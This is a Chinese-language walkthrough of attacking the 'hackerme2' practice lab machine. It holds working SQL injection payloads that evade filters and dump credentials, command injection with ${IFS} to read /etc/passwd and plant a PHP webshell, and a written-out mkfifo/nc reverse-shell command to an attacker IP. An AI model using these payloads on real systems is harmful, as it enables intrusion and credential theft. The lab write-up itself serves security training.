您的位置:首页 > 教育 > 培训 > hackerme2靶机渗透~SQL注入+命令执行

hackerme2靶机渗透~SQL注入+命令执行

2024/10/6 11:31:37 来源:https://blog.csdn.net/weixin_67832625/article/details/141109805  浏览:    关键词:hackerme2靶机渗透~SQL注入+命令执行

在这里插入图片描述

0x01信息收集

# 主机发现
arp-scan -l

image-20240811163753747

# 端口扫描
nmap 192.168.66.142

image-20240811163854185

# 目录扫描
dirb http://192.168.66.142

image-20240811164239053

0x02漏洞挖掘

# 进入主页面我们发现是登录页面,没有用户名也没有密码,但是有注册的链接,所以我们可以通过注册一个新用户

image-20240811164513661

image-20240811164608209

# 使用注册的用户登录成功

image-20240811165124655

SQL注入

# 使用sqlmap测试是否有sql注入漏洞
sqlmap -u 'http://192.168.30.207/welcome.php' --data="search=OSINT" --cookie="PHPSESSID=boujv14h358os0cru6q5afevt9"  --level=3 --risk=3  --batchsqlmap: 这是用于自动化检测和利用 SQL 注入漏洞的工具。-u 'http://192.168.30.207/welcome.php': 指定要测试的 URL 地址。--data="search=OSINT": 指定 POST 请求的参数数据。在这个例子中,search=OSINT 是 POST 请求的参数数据,search 是参数名,OSINT 是参数值。--cookie="PHPSESSID=boujv14h358os0cru6q5afevt9": 提供一个 Cookie 值,以便在测试时保持会话状态。这通常用于需要用户身份验证的网站。--level=3: 设置检测的级别。级别从 1 到 5,级别越高,测试的深度和复杂度越大。级别 3 是一个中等水平,通常足够深入地检测 SQL 注入漏洞。--risk=3: 设置风险级别。风险级别从 0 到 3,数值越高,测试的攻击性越强。级别 3 表示较高的风险,可能会尝试一些更激进的测试方法。
--batch: 意思是自动默认回答所有问题

image-20240811174151982

尝试了很多次,sqlmap都跑不出来,说明有WAF或者代码中存在过滤,那我们就手工注入

# 经过我们手注测试数据库
x%'/**/union/**/select/**/user(),database(),version()#

image-20240811174723243

# 爆数据库中的表
x%'/**/union/**/select/**/TABLE_NAME,2,3/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=database()#

image-20240811174823138

# 获取数据库中的列名
x%'/**/union/**/select/**/column_name,2,3/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_SCHEMA=database()/**/and/* */TABLE_NAME='users'#

image-20240811174930692

# 获取此数据库中的所有数据
x%'/**/union/**/select/**/user,pasword,3/**/from/**/users#

image-20240811175040656

# 发现密码被MD5给加密了,那么我们直接给他破解了

image-20240811175231116

# 然后用用户名和密码进行登录查看
账号:superadmin 密码:Uncrackable

image-20240811175804376

文件上传

# 我们通过抓包给他上传一句话木马,看是否能成功

image-20240811175937966

image-20240811180146398

image-20240811180329736

经过测试,发现上传假图片头木马和图片马都不行,修改照片后缀可以上传,但是又不存在uploads这个文件夹,说明没有漏洞上传点

命令执行漏洞

# 在下面我们又发现了好东西,可以看一下

image-20240811180849899

image-20240811180906562

# 看来还真是可以,那我们直接查看一下/etc/passwd# 由于这里空格被过滤了,所以我们用${IFS}代替

image-20240811181430478

# 我们通过查看一下我们当前访问的这个网站 发现了图片的路径,并且发现没有过滤asp,aspx后缀的文件

image-20240811181822860

# 我们知道了上传的路径,由于刚才我们上传一个1.jpg,现在我们可以通过命令执行将1.jpg换成1.php# 然后访问http://192.168.66.142/uploads/year2020/1.php

image-20240811183216664

image-20240811183229324

0x03反弹shell

# 连接蚁剑成功

image-20240811183335805

# 在kali上开启一个监听
nc -lvnp 9999

image-20240811184552773

# 在蚁剑上运行反弹到kali
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.66.128 9999 >/tmp/f

image-20240811184745092

0x04提权

# 筛选一下可登录用户
cat  /etc/passwd |grep /bin/bash

image-20240811184945745

# 在目录里发现一个可执行的二进制文件,对其执行,提权成功

image-20240811185240942

好小子,离成功又近一步!!!

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com